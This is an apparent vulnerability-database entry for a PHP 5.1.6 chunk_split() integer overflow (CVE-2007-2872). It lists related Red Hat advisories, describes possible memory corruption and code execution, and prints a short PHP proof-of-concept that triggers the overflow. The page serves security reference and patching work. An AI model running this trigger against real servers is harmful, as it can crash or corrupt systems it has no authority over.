PHP 5.1.6 - 'Chunk_Split()' Integer Overflow
| Reporter | Title | Published | Views | Family All 94 |
|---|---|---|---|---|
| CVE-2007-2872 | 10 Sep 201704:52 | – | redhat | |
| Moderate: Red Hat Security Advisory: php security update | 23 Oct 200715:54 | – | redhat | |
| php chunk_split integer overflow | 23 Oct 200715:54 | – | redhat | |
| Moderate: Red Hat Security Advisory: php security update | 26 Sep 200708:34 | – | redhat | |
| php chunk_split integer overflow | 26 Sep 200708:34 | – | redhat | |
| Moderate: Red Hat Security Advisory: php security update | 20 Sep 200713:10 | – | redhat | |
| php chunk_split integer overflow | 20 Sep 200713:10 | – | redhat | |
| Moderate: Red Hat Security Advisory: php security update | 25 Oct 200717:33 | – | redhat | |
| php chunk_split integer overflow | 25 Oct 200717:33 | – | redhat | |
| PHP 5.x < 5.2.3 Multiple Vulnerabilities | 4 Jun 200700:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/24261/info
PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects versions prior to PHP 5.2.3.
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.08878